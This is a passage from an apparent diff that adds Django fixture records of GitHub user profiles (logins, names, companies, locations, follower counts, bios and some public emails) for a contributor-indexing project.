6, + "created_at": "2018-10-18T10:47:38Z", + "updated_at": "2024-08-12T09:49:04Z", + "node_id": "MDQ6VXNlcjQ0MjYxMzM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1449, + "fields": { + "nest_created_at": "2024-09-11T23:27:40.969Z", + "nest_updated_at": "2024-09-11T23:27:40.969Z", + "name": "", + "login": "savu-a", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123734715?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-27T10:52:06Z", + "updated_at": "2024-06-21T08:26:32Z", + "node_id": "U_kgDOB2AKuw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1450, + "fields": { + "nest_created_at": "2024-09-11T23:27:43.056Z", + "nest_updated_at": "2024-09-12T02:08:10.616Z", + "name": "Michael Keppler", + "login": "Bananeweizen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/406876?v=4", + "company": "", + "location": "Stuttgart, Germany", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 53, + "public_gists_count": 2, + "public_repositories_count": 140, + "created_at": "2010-09-19T09:56:02Z", + "updated_at": "2024-08-23T11:48:19Z", + "node_id": "MDQ6VXNlcjQwNjg3Ng==", + "bio": "Passionate open source developer with strong opinions about clean code.", + "is_hireable": false, + "twitter_username": "bananeweizen" + } +}, +{ + "model": "github.user", + "pk": 1451, + "fields": { + "nest_created_at": "2024-09-11T23:27:43.866Z", + "nest_updated_at": "2024-09-11T23:27:43.866Z", + "name": "Alexey Loubyansky", + "login": "aloubyansky", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/323379?v=4", + "company": "Red Hat", + "location": "Neuchatel, Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 49, + "public_gists_count": 1, + "public_repositories_count": 86, + "created_at": "2010-07-05T15:13:06Z", + "updated_at": "2024-08-31T17:32:45Z", + "node_id": "MDQ6VXNlcjMyMzM3OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1452, + "fields": { + "nest_created_at": "2024-09-11T23:27:46.495Z", + "nest_updated_at": "2024-09-13T05:18:39.109Z", + "name": "Karthika Geethanand ¯\\_(ツ)_/¯", + "login": "karthika-g", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40568919?v=4", + "company": "Siemens", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-06-25T12:56:30Z", + "updated_at": "2024-08-27T10:21:23Z", + "node_id": "MDQ6VXNlcjQwNTY4OTE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1453, + "fields": { + "nest_created_at": "2024-09-11T23:27:47.729Z", + "nest_updated_at": "2024-09-11T23:27:47.729Z", + "name": "Ben Spiller", + "login": "ben-spiller", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11992588?v=4", + "company": "", + "location": "Cambridge, UK", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2015-04-17T10:22:26Z", + "updated_at": "2024-08-18T11:27:00Z", + "node_id": "MDQ6VXNlcjExOTkyNTg4", + "bio": "Experienced Java/C#/Python/C++ software professional", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1454, + "fields": { + "nest_created_at": "2024-09-11T23:27:49.805Z", + "nest_updated_at": "2024-09-22T19:40:11.568Z", + "name": "Rodrigo Carvalho Silva", + "login": "rcsilva83", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45306?v=4", + "company": "@bacen", + "location": "Brasil", + "collaborators_count": 0, + "following_count": 36, + "followers_count": 50, + "public_gists_count": 3, + "public_repositories_count": 20, + "created_at": "2009-01-09T10:38:19Z", + "updated_at": "2024-09-16T12:31:51Z", + "node_id": "MDQ6VXNlcjQ1MzA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1455, + "fields": { + "nest_created_at": "2024-09-11T23:27:51.465Z", + "nest_updated_at": "2024-09-22T17:34:20.402Z", + "name": "Benjamin Papez", + "login": "bpapez", + "email": "bpapez@jahia.com", + "avatar_url": "https://avatars.githubusercontent.com/u/753358?v=4", + "company": "Jahia Solutions GmbH", + "location": "Klagenfurt", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2011-04-26T20:52:18Z", + "updated_at": "2024-07-30T22:54:52Z", + "node_id": "MDQ6VXNlcjc1MzM1OA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1456, + "fields": { + "nest_created_at": "2024-09-11T23:27:52.680Z", + "nest_updated_at": "2024-09-11T23:27:52.680Z", + "name": "", + "login": "oli271078", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43000141?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-09-05T10:50:31Z", + "updated_at": "2024-01-24T10:17:08Z", + "node_id": "MDQ6VXNlcjQzMDAwMTQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1457, + "fields": { + "nest_created_at": "2024-09-11T23:27:53.479Z", + "nest_updated_at": "2024-09-22T19:35:00.594Z", + "name": "Colm O hEigeartaigh", + "login": "coheigea", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/472162?v=4", + "company": "Qlik", + "location": "Dublin, Ireland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 61, + "public_gists_count": 85, + "public_repositories_count": 61, + "created_at": "2010-11-08T09:49:13Z", + "updated_at": "2024-09-20T10:47:12Z", + "node_id": "MDQ6VXNlcjQ3MjE2Mg==", + "bio": "Senior principal product security engineer at Qlik, security contributor at @apache.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1458, + "fields": { + "nest_created_at": "2024-09-11T23:27:54.304Z", + "nest_updated_at": "2024-09-11T23:27:54.304Z", + "name": "Mark Raynsford", + "login": "io7m", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/612494?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 57, + "public_gists_count": 20, + "public_repositories_count": 393, + "created_at": "2011-02-11T09:37:04Z", + "updated_at": "2024-05-04T21:21:43Z", + "node_id": "MDQ6VXNlcjYxMjQ5NA==", + "bio": "Spice Miner", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1459, + "fields": { + "nest_created_at": "2024-09-11T23:27:55.522Z", + "nest_updated_at": "2024-09-11T23:27:55.522Z", + "name": "Emilio", + "login": "elahrvivaz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7715322?v=4", + "company": "@ccri", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 32, + "public_gists_count": 10, + "public_repositories_count": 14, + "created_at": "2014-05-27T15:56:40Z", + "updated_at": "2024-08-07T11:26:23Z", + "node_id": "MDQ6VXNlcjc3MTUzMjI=", + "bio": "Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1460, + "fields": { + "nest_created_at": "2024-09-11T23:27:56.339Z", + "nest_updated_at": "2024-09-11T23:27:56.339Z", + "name": "Denis Nikiforov", + "login": "AresEkb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2684293?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 51, + "created_at": "2012-10-30T14:53:23Z", + "updated_at": "2024-05-12T13:45:53Z", + "node_id": "MDQ6VXNlcjI2ODQyOTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1461, + "fields": { + "nest_created_at": "2024-09-11T23:27:57.142Z", + "nest_updated_at": "2024-09-11T23:27:57.142Z", + "name": "Matthew", + "login": "vetsin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/131726?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 20, + "public_gists_count": 3, + "public_repositories_count": 38, + "created_at": "2009-09-26T23:31:54Z", + "updated_at": "2024-08-21T03:17:28Z", + "node_id": "MDQ6VXNlcjEzMTcyNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1462, + "fields": { + "nest_created_at": "2024-09-11T23:27:58.380Z", + "nest_updated_at": "2024-09-12T00:33:01.351Z", + "name": "Simon", + "login": "sbernard31", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/840294?v=4", + "company": "", + "location": "France", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 65, + "public_gists_count": 1, + "public_repositories_count": 28, + "created_at": "2011-06-09T15:49:51Z", + "updated_at": "2023-08-18T14:05:08Z", + "node_id": "MDQ6VXNlcjg0MDI5NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1463, + "fields": { + "nest_created_at": "2024-09-11T23:27:59.601Z", + "nest_updated_at": "2024-09-11T23:27:59.601Z", + "name": "", + "login": "pvgoddijn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/155655?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2009-11-19T21:49:19Z", + "updated_at": "2023-11-01T09:42:03Z", + "node_id": "MDQ6VXNlcjE1NTY1NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1464, + "fields": { + "nest_created_at": "2024-09-11T23:28:00.431Z", + "nest_updated_at": "2024-09-22T19:29:06.981Z", + "name": "Arnout Engelen", + "login": "raboof", + "email": "github@bzzt.net", + "avatar_url": "https://avatars.githubusercontent.com/u/131856?v=4", + "company": "Self-employed, Apache Software Foundation", + "location": "Deventer, NL", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 396, + "public_gists_count": 14, + "public_repositories_count": 677, + "created_at": "2009-09-27T12:30:18Z", + "updated_at": "2024-01-02T16:17:18Z", + "node_id": "MDQ6VXNlcjEzMTg1Ng==", + "bio": "Available for Open Source contract work", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1465, + "fields": { + "nest_created_at": "2024-09-11T23:28:01.286Z", + "nest_updated_at": "2024-09-11T23:28:01.286Z", + "name": "Luc Kleeven", + "login": "lkleeven", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33747863?v=4", + "company": "bol.com", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-11-17T08:52:46Z", + "updated_at": "2024-03-18T07:32:51Z", + "node_id": "MDQ6VXNlcjMzNzQ3ODYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1466, + "fields": { + "nest_created_at": "2024-09-11T23:28:02.130Z", + "nest_updated_at": "2024-09-22T18:47:22.007Z", + "name": "", + "login": "XSpielinbox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55600187?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-09-20T18:25:56Z", + "updated_at": "2024-09-06T11:58:35Z", + "node_id": "MDQ6VXNlcjU1NjAwMTg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1467, + "fields": { + "nest_created_at": "2024-09-11T23:28:04.180Z", + "nest_updated_at": "2024-09-22T18:46:58.992Z", + "name": "Piotr P. Karwasz", + "login": "ppkarwasz", + "email": "piotr@github.copernik.eu", + "avatar_url": "https://avatars.githubusercontent.com/u/12533274?v=4", + "company": "Copernik.eu", + "location": "Gdynia, Poland", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 20, + "public_gists_count": 4, + "public_repositories_count": 58, + "created_at": "2015-05-20T17:46:18Z", + "updated_at": "2024-09-21T16:09:27Z", + "node_id": "MDQ6VXNlcjEyNTMzMjc0", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1468, + "fields": { + "nest_created_at": "2024-09-11T23:28:06.269Z", + "nest_updated_at": "2024-09-11T23:28:06.269Z", + "name": "Apusic", + "login": "apusic", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40617096?v=4", + "company": "Apusic", + "location": "Shenzhen, China", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-06-27T01:28:32Z", + "updated_at": "2024-06-13T05:00:25Z", + "node_id": "MDQ6VXNlcjQwNjE3MDk2", + "bio": "apusic.com", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1469, + "fields": { + "nest_created_at": "2024-09-11T23:28:07.098Z", + "nest_updated_at": "2024-09-11T23:28:07.098Z", + "name": "", + "login": "lonewalker0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112616871?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-09-01T08:22:48Z", + "updated_at": "2024-06-25T07:58:54Z", + "node_id": "U_kgDOBrZlpw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1470, + "fields": { + "nest_created_at": "2024-09-11T23:28:07.922Z", + "nest_updated_at": "2024-09-22T18:46:55.623Z", + "name": "", + "login": "jonnybecker", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2277642?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2012-09-04T12:38:48Z", + "updated_at": "2024-09-06T11:14:46Z", + "node_id": "MDQ6VXNlcjIyNzc2NDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1471, + "fields": { + "nest_created_at": "2024-09-11T23:29:46.020Z", + "nest_updated_at": "2024-09-11T23:29:46.020Z", + "name": "", + "login": "benno85", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48588075?v=4", + "company": "", + "location": "Nuremberg, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-03-15T10:15:49Z", + "updated_at": "2024-03-01T14:27:08Z", + "node_id": "MDQ6VXNlcjQ4NTg4MDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1472, + "fields": { + "nest_created_at": "2024-09-11T23:29:55.246Z", + "nest_updated_at": "2024-09-22T18:47:18.473Z", + "name": "sluetge", + "login": "RSM-SLU", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/105483343?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-05-13T07:39:00Z", + "updated_at": "2024-08-12T13:35:01Z", + "node_id": "U_kgDOBkmMTw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1473, + "fields": { + "nest_created_at": "2024-09-11T23:30:50.899Z", + "nest_updated_at": "2024-09-13T05:18:16.868Z", + "name": "", + "login": "MLSTRM", + "email": "chris_nitro@hotmail.co.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/1293985?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-12-29T23:02:23Z", + "updated_at": "2024-06-28T10:15:59Z", + "node_id": "MDQ6VXNlcjEyOTM5ODU=", + "bio": "Christopher Wall", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1474, + "fields": { + "nest_created_at": "2024-09-11T23:33:26.784Z", + "nest_updated_at": "2024-09-11T23:33:26.784Z", + "name": "Medical Aegis", + "login": "Medical-Aegis", + "email": "support@medicalaegis.com", + "avatar_url": "https://avatars.githubusercontent.com/u/108425450?v=4", + "company": "", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-29T17:32:55Z", + "updated_at": "2023-06-22T19:13:29Z", + "node_id": "O_kgDOBnZw6g", + "bio": "Digital health technology cyber risk management.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1475, + "fields": { + "nest_created_at": "2024-09-11T23:33:28.428Z", + "nest_updated_at": "2024-09-22T18:49:32.104Z", + "name": "Itay Shakury", + "login": "itaysk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1161307?v=4", + "company": "Aqua Security", + "location": "Israel", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 118, + "public_gists_count": 24, + "public_repositories_count": 97, + "created_at": "2011-10-30T20:55:08Z", + "updated_at": "2024-09-22T08:43:23Z", + "node_id": "MDQ6VXNlcjExNjEzMDc=", + "bio": "VP Open Source at \r\nAqua Security | CNCF Ambassador", + "is_hireable": false, + "twitter_username": "itaysk" + } +}, +{ + "model": "github.user", + "pk": 1476, + "fields": { + "nest_created_at": "2024-09-11T23:33:30.169Z", + "nest_updated_at": "2024-09-11T23:33:30.169Z", + "name": "David Dillard", + "login": "ddillard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9905204?v=4", + "company": "Veritas Technologies LLC", + "location": "Central Florida", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-11-22T21:17:17Z", + "updated_at": "2024-06-04T02:34:46Z", + "node_id": "MDQ6VXNlcjk5MDUyMDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1477, + "fields": { + "nest_created_at": "2024-09-11T23:33:32.259Z", + "nest_updated_at": "2024-09-11T23:33:32.259Z", + "name": "a", + "login": "umbellate", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107409588?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-06-13T12:16:10Z", + "updated_at": "2024-07-30T14:16:13Z", + "node_id": "U_kgDOBmbwtA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1478, + "fields": { + "nest_created_at": "2024-09-11T23:33:37.786Z", + "nest_updated_at": "2024-09-11T23:33:37.786Z", + "name": "", + "login": "linroad123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32862076?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2017-10-17T06:08:27Z", + "updated_at": "2024-08-19T18:32:45Z", + "node_id": "MDQ6VXNlcjMyODYyMDc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1479, + "fields": { + "nest_created_at": "2024-09-11T23:33:39.894Z", + "nest_updated_at": "2024-09-22T18:48:18.493Z", + "name": "Andreas Fehlner", + "login": "andife", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20612932?v=4", + "company": "", + "location": "Rottweil, Germany", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 83, + "created_at": "2016-07-23T13:19:41Z", + "updated_at": "2024-09-17T08:41:02Z", + "node_id": "MDQ6VXNlcjIwNjEyOTMy", + "bio": "Software Developer AI, ONNX Steering Committee Emeritus\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1480, + "fields": { + "nest_created_at": "2024-09-11T23:33:43.243Z", + "nest_updated_at": "2024-09-22T19:48:37.169Z", + "name": "", + "login": "KramNamez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108786702?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2022-07-06T06:30:30Z", + "updated_at": "2024-08-31T07:48:07Z", + "node_id": "U_kgDOBnv0Dg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1481, + "fields": { + "nest_created_at": "2024-09-11T23:33:47.961Z", + "nest_updated_at": "2024-09-11T23:33:47.961Z", + "name": "Frederik Leonhardt", + "login": "fkleon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/448110?v=4", + "company": "@catalyst", + "location": "Wellington, New Zealand", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 26, + "public_gists_count": 8, + "public_repositories_count": 53, + "created_at": "2010-10-21T10:48:54Z", + "updated_at": "2024-07-25T02:38:02Z", + "node_id": "MDQ6VXNlcjQ0ODExMA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1482, + "fields": { + "nest_created_at": "2024-09-11T23:33:56.182Z", + "nest_updated_at": "2024-09-22T19:41:24.937Z", + "name": "Juan Cruz", + "login": "JCHacking", + "email": "juancruzmencia@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10503588?v=4", + "company": "@arsys-internet", + "location": "Haro, La Rioja (España)", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-01-12T18:27:11Z", + "updated_at": "2024-08-14T21:03:18Z", + "node_id": "MDQ6VXNlcjEwNTAzNTg4", + "bio": "Informático de profesión y por afición.", + "is_hireable": true, + "twitter_username": "JCHacking" + } +}, +{ + "model": "github.user", + "pk": 1483, + "fields": { + "nest_created_at": "2024-09-11T23:35:10.242Z", + "nest_updated_at": "2024-09-22T18:53:40.170Z", + "name": "Paul Horton", + "login": "madpah", + "email": "paul.horton@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/10280392?v=4", + "company": "@sonatype @CycloneDX ", + "location": "UK", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 58, + "created_at": "2014-12-23T13:09:46Z", + "updated_at": "2024-09-01T14:56:11Z", + "node_id": "MDQ6VXNlcjEwMjgwMzky", + "bio": "IT geek, Digital, DevSecOps, Food...", + "is_hireable": false, + "twitter_username": "madpah" + } +}, +{ + "model": "github.user", + "pk": 1484, + "fields": { + "nest_created_at": "2024-09-11T23:35:20.729Z", + "nest_updated_at": "2024-09-19T07:26:16.111Z", + "name": "Joshua Kugler", + "login": "jkugler", + "email": "joshua@azariah.com", + "avatar_url": "https://avatars.githubusercontent.com/u/78939?v=4", + "company": "@adobe, Azariah Enterprises", + "location": "Fairbanks, AK", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 10, + "public_gists_count": 7, + "public_repositories_count": 33, + "created_at": "2009-04-28T21:52:36Z", + "updated_at": "2024-09-05T22:42:53Z", + "node_id": "MDQ6VXNlcjc4OTM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1485, + "fields": { + "nest_created_at": "2024-09-11T23:35:21.952Z", + "nest_updated_at": "2024-09-11T23:35:21.952Z", + "name": "", + "login": "hseg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1260405?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2011-12-13T14:13:03Z", + "updated_at": "2024-08-28T18:23:46Z", + "node_id": "MDQ6VXNlcjEyNjA0MDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1486, + "fields": { + "nest_created_at": "2024-09-11T23:35:23.590Z", + "nest_updated_at": "2024-09-16T22:19:39.022Z", + "name": "", + "login": "maitrey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/953916?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2011-08-02T11:35:27Z", + "updated_at": "2024-09-12T14:02:03Z", + "node_id": "MDQ6VXNlcjk1MzkxNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1487, + "fields": { + "nest_created_at": "2024-09-11T23:35:24.388Z", + "nest_updated_at": "2024-09-16T22:19:39.650Z", + "name": "Saquib Saifee", + "login": "saquibsaifee", + "email": "saquibsaifee2@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/66195765?v=4", + "company": "IBM", + "location": "United States", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-05-31T06:05:51Z", + "updated_at": "2024-09-10T16:21:10Z", + "node_id": "MDQ6VXNlcjY2MTk1NzY1", + "bio": "", + "is_hireable": true, + "twitter_username": "saquibsaifee" + } +}, +{ + "model": "github.user", + "pk": 1488, + "fields": { + "nest_created_at": "2024-09-11T23:35:34.783Z", + "nest_updated_at": "2024-09-12T00:08:12.170Z", + "name": "", + "login": "weichslgartner", + "email": "weichslgartner@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24318127?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 15, + "public_gists_count": 2, + "public_repositories_count": 29, + "created_at": "2016-12-02T14:10:54Z", + "updated_at": "2024-08-30T10:37:19Z", + "node_id": "MDQ6VXNlcjI0MzE4MTI3", + "bio": "", + "is_hireable": false, + "twitter_username": "weichslgartner" + } +}, +{ + "model": "github.user", + "pk": 1489, + "fields": { + "nest_created_at": "2024-09-11T23:37:01.564Z", + "nest_updated_at": "2024-09-11T23:37:01.564Z", + "name": "", + "login": "liaoyuan1011", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10594044?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-01-19T07:09:38Z", + "updated_at": "2022-05-09T03:17:18Z", + "node_id": "MDQ6VXNlcjEwNTk0MDQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1490, + "fields": { + "nest_created_at": "2024-09-11T23:37:03.247Z", + "nest_updated_at": "2024-09-22T18:48:40.575Z", + "name": "Ryan Cammer", + "login": "ryancammer", + "email": "ryancammer@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/376128?v=4", + "company": "Ryan Cammer", + "location": "Bozeman, MT", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 18, + "public_gists_count": 3, + "public_repositories_count": 12, + "created_at": "2010-08-25T20:38:18Z", + "updated_at": "2024-09-04T18:54:55Z", + "node_id": "MDQ6VXNlcjM3NjEyOA==", + "bio": "for (of of ['of']){ console.log(of);}", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1491, + "fields": { + "nest_created_at": "2024-09-11T23:37:05.263Z", + "nest_updated_at": "2024-09-22T18:48:36.632Z", + "name": "", + "login": "fatsolko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76652885?v=4", + "company": "", + "location": "Belgrade", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-12-27T13:39:52Z", + "updated_at": "2024-09-16T12:24:27Z", + "node_id": "MDQ6VXNlcjc2NjUyODg1", + "bio": "DevOps Engineer\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1492, + "fields": { + "nest_created_at": "2024-09-11T23:37:10.478Z", + "nest_updated_at": "2024-09-22T18:48:46.642Z", + "name": "Amy Keibler", + "login": "amy-keibler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3483663?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 62, + "created_at": "2013-02-05T16:54:58Z", + "updated_at": "2024-01-02T19:55:16Z", + "node_id": "MDQ6VXNlcjM0ODM2NjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "amelia_codes" + } +}, +{ + "model": "github.user", + "pk": 1493, + "fields": { + "nest_created_at": "2024-09-11T23:37:16.766Z", + "nest_updated_at": "2024-09-11T23:37:16.766Z", + "name": "Adam Crain", + "login": "jadamcrain", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/305813?v=4", + "company": "Step Function I/O", + "location": "Bend, OR", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 87, + "public_gists_count": 15, + "public_repositories_count": 7, + "created_at": "2010-06-15T13:42:49Z", + "updated_at": "2024-08-10T06:55:03Z", + "node_id": "MDQ6VXNlcjMwNTgxMw==", 